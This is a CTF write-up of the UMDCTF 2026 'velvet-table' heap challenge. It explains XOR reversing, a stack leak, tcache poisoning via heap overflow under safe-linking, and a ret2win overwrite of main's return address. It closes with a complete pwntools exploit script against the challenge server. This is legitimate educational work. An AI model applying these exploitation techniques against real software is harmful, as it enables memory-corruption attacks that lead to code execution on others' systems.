velvet-table

UMDCTF 2026 blessed us with five whole pwn challenges. Sadly, I was busy with... something else at the time, but the challenges were still avaliable even after the CTF had ended. Since I had nothing better to do, I decided to take a look at some of these challenges.

Since I'd still consider myself mediocre at best regarding heap pwn, velvet-table caught my eye with some arbitrary malloc chunk allocations in the code.

TL;DR

Alongside the pwn part of the challenge, there was also a bit of reversing. Many of the values were XOR-encrypted with static(ish) keys, so the reversing wasn't hard, just tedious. The binary had many heap vulnerabilities. A heap overflow in update and a use-after-free on every single cashout call, which might have been intended to be much more limited? I used the heap overflow, since I failed to notice the UAF.

With it, I poisoned the tcache, allocating a chunk on the stack and overwriting the function's return address, as I was too lazy to rewrite the payout hash.

Introduction

We don't get any info about the glibc version actually used on the server. This could be a problem, as the heap implementation has changed throughout libc versions. I assumed that it was a version which had a tcache and safe-linking, and I was thankfully correct.

The actual logic of the program is quite simple, just hidden behind XORs and sometimes decompiled in an ugly manner, because the binary was compiled with optimizations turned on. Our eight choices are quite simple:

While most of the XORs are done with static values, some also reference keys which are derived from a stack address. This means we need a stack leak.

Leak at first print

the stack was hiding in plain sight

When the program starts, it gives us a "table marker", which is a 32 bit integer. The marker is printed like so:

...

encbase = (ulong)dealer_note_arr >> 4;
...
i_encbase = (uint)encbase;
...
__printf_chk(1,"table marker: 0x%08x\n",i_encbase ^ 0x9ac90307);

...

Since dealer_note_arr is actually an array, this sets encbase to dealer_note_arr's address, which is rsp+0x90, shifted to the right by 4 bits. Since the stack is always aligned to 0x10, this means that the last nibble of the array's address will be 0. All that's missing is the top 7 nibbles, but the stack is always mapped such that the top nibbles are always 0x7ff. We can thus assemble rsp with these static nibbles, sandwiching the unXORed table marker in between.

Exploiting the heap

tcache my beloved

Now that we have everything we need to decipher the tedious XORs, let's get to the pwn part of the pwn challenge.

Since update can write way past the bounds of a chunk, overwriting the metadata of further chunks. I chose to poison the tcache, abusing it to read the default payout function pointer on the stack, leaking PIE.

To prepare for all the later allocations, I allocate 6 chunks into seats 1 through 6. I chose a size of 130, as the lower bound for the size of the chunk was 128, and 130 just felt right.

Since the chunks are sequential on the heap, we can update chunk 1 with data much longer than just that chunk. By crafting data which perfectly matches the overall chunk structure on the heap, we can edit the data of chunk 3. By forging its forward pointer, we can poison the tcache, making the second allocation of this size allocate a chunk at any arbitrary position in memory.

Since the glibc used has safe linking, the forward pointer is actually (chunk_addr >> 12) ^ real_fd. Since reserve gives us the address of our heap chunks, we don't even need a heap leak, so forging forward pointers is trivial.

Since we got the stack's address from the table marker, we can make the forward pointer of the first tcache chunk point to rsp+0xb0, which is the address of the payout function pointer.

The chunk which belonged to seat 2 is left floating in the heap. Since it isn't linked to any list, it stays there, in a limbo of not being allocated, and at the same time, not being allocatable. That's why the next tcache manipulations use fresh chunks: so I don't have to tiptoe around a ghost.

We then reserve two chunks into seats 7 and 8. The first one is normal, but the second is now on the stack. This means that we can read its contents out with inspect. Since we read out the payout function's address, we now have a pie leak. The output of inspect is encrypted, but decrypting it is trivial, since we have all the static and stack-based keys through a bit of reversing.

def inspect_bytes(chars, seat):
    global uVar8 # = ((rsp+0x90>>4)^0x5a17c3d9) & 0xffffffff
    global b_off # = ((rsp+0x90>>4)^0x7e) & 0xf
    i = 0
    j = 0
    dat = []
    for c in chars:
        t1 = ((b_off ^ seat)+3) & 0xf
        u1 = (t1 * 0x45d9f3b ^ uVar8 ^ i) & 0xffffffff
        b3 = (t1 + j) & 7
        ch = ((rol(u1, b3, 32)) ^ c) & 0xff
        dat.append(ch)
        i += 0x9e37
        j += 1
    return bytes(dat)

Winning

never enough ret2win

Now, the normal choice would be to simply update the function pointer and the hash with win. At this point, I had had enough of all these XORs and tracking down their values throughout the codebase, and since this was all solved after the end of the CTF, I decided to make a small detour.

I noticed that leave actually returns from main with code 0, instead of directly invoking exit(0). Since the offset of the return address is known, I decided to do a traditional ret2win.

Using a similar setup as before, we free chunks 5 and 6 (which we allocated beforehand) and overflow chunk 4, giving us a tcache which looks very similar to before. The return address of main is at a static offset up from rsp, that being rsp+0x618. Since all allocated chunks must be 0x10-aligned, we allocate at rsp+0x610 and compensate later.

Now, we allocate seats 10 and 11. Seat 10 takes the first mundane chunk and seat 11 is now near our return address. We then update seat 11, whose chunk is 8 bytes before the return address. Since the stack will be unaligned after the return, we use win+8, which skips the stack realignment in the form of sub rsp, 8, which would actually misalign our stack. The data is the address of win+8, padded with 8 As.

#! /usr/bin/env python3
from pwn import *
from docker_dbg import *

context.terminal = which("kitty")

exe = context.binary = ELF(args.EXE or 'velvet-table_patched')

host = args.HOST or 'challs.umdctf.io'
port = int(args.PORT or 30304)

cont_name = "cont_name"
cont_app = "app"


gdbscript = f'''
set $pie = *'__cxa_finalize@plt'-0x10f0
b *$pie+0x11c0
b *$pie+0x13ce
continue
'''

argv = []

if args.DEBUG:
    context.log_level = "DEBUG"
if args.GDB:
    if args.DOCKER:
        p = remote("localhost", 1337); docker_attach(proc=cont_app, container=cont_name, gdbscript=gdbscript)
    else:
        p = gdb.debug([exe.path] + argv, gdbscript=gdbscript)
elif args.LOCAL:
    p = process([exe.path] + argv)
elif args.REMOTE:
    p = remote(host, port)
else:
#   p = gdb.debug([exe.path] + argv, gdbscript=gdbscript)
    p = process([exe.path] + argv)
#   p = remote("localhost", 1337); docker_attach(proc=cont_app, container=cont_name, gdbscript=gdbscript)
#   p = remote(host, port)

def inspect_bytes(chars):
    global uVar8
    i = 0
    j = 0
    dat = []
    for c in chars:
        t1 = ((b_off ^ seat)+3) & 0xf
        u1 = inted(t1 * 0x45d9f3b ^ uVar8 ^ i)
        b3 = (t1 + j) & 7
        ch = byted(rol(u1, b3, 32)) ^ c
        print("stuff: ", *[hex(n) for n in [t1, u1, b3, ch, i, j]])
        dat.append(ch)
        i += 0x9e37
        j += 1
    return bytes(dat)

def byted(i):
    return i & 0xff
def shorted(i):
    return i & 0xffff
def inted(i):
    return i & 0xffffffff
def longed(i):
    return i & 0xffffffffffffffff

p.recvuntil(b"table marker: ")
tablemarker = int(p.recvline(), 16)

rsp = 0x00007ff000000000+(((tablemarker ^ 0x9ac90307))<<4) - 0x90
b_off = ((rsp+0x90>>4)^0x7e)&0xf
uVar8 = inted((rsp+0x90>>4)^0x5a17c3d9)
print(*[hex(n) for n in [rsp, b_off, uVar8]])

heaps = [0,0,0,0,0,0,0,0,0,0,0]

for i in range(1, 7):
    p.sendline(f"1\n{i}\n130".encode())
    p.recvuntil(b"confirmed: ")
    heaps[i] = int(p.recvline(), 16)
p.sendline(b"2\n2")
p.sendline(b"2\n3")
p.sendline(b"7")
p.sendline(b"3\n1\n296")
size=0x90
thing = b"A"*(size-8)+(p64(0x0000000000000091)+p64((heaps[2]>>12)^0)).ljust(size, b"\0")+(p64(0x91)+p64((heaps[3]>>12)^(rsp+0xb0)))
p.sendline(thing)
p.sendline(b"1\n8\n130")
p.sendline(b"1\n9\n130")
p.sendline(b"not_a_choice")
p.recvuntil(b" choice.")
p.recvuntil(b" choice.")
p.sendline(b"4")
p.recvuntil(b"seat: ")
p.sendline(b"9")
"""
printed addr = (uint)(rsp+0x90)^0x9ac90307
b_off = ((rsp+0x90>>4)^0x7e)&0xf
trueResOffset = (b_off^seat)+3 & 0xf
u8 = (uint)(rsp+0x90>>4)^0x5a17c3d9

inspecting:
    - t1 = ((b_off ^ seat)+3) & 0xf
    - u1 = t1 * 0x45d9f3b ^ u8 ^ i
    - b3 = (t1 + j) & 7
    - c = rol(u1, b3) ^ chunk[j]
    - i += 0x9e37
    - j += 1
"""
seat = 9
chars = p.recvn(0x40)
dat = inspect_bytes(chars)
thing2 = b"A"*(size-8)+(p64(0x0000000000000091)+p64((heaps[5]>>12)^0)).ljust(size, b"\0")+(p64(0x91)+p64((heaps[6]>>12)^(rsp+0x610)))
p.sendline(b"2\n5")
p.sendline(b"2\n6")
p.sendline(b"3\n4\n296")
p.sendline(thing2)
p.sendline(b"1\n10\n130")
p.sendline(b"1\n11\n130")
p.sendline(b"3\n11\n16")
p.sendline(b"A"*8+p64(u64(dat[0:8])+0x18))
p.interactive()

Conclusion

Turns out that the dealer-notes weren't useless. Frederik's wonderful writeup shows that tcache poisoning wasn't the intended solution. That's also visible from the flag, but still, kudos to him for revisiting the challenge and finding the intended solve.

/root/blog/velvet-table yes twin, we (yes WE) love xor

TL;DR

Introduction

Leak at first printthe stack was hiding in plain sight

Exploiting the heaptcache my beloved

Winningnever enough ret2win

Conclusion

/root/blog/velvet-table
yes twin, we (yes WE) love xor

Leak at first print
the stack was hiding in plain sight

Exploiting the heap
tcache my beloved

Winning
never enough ret2win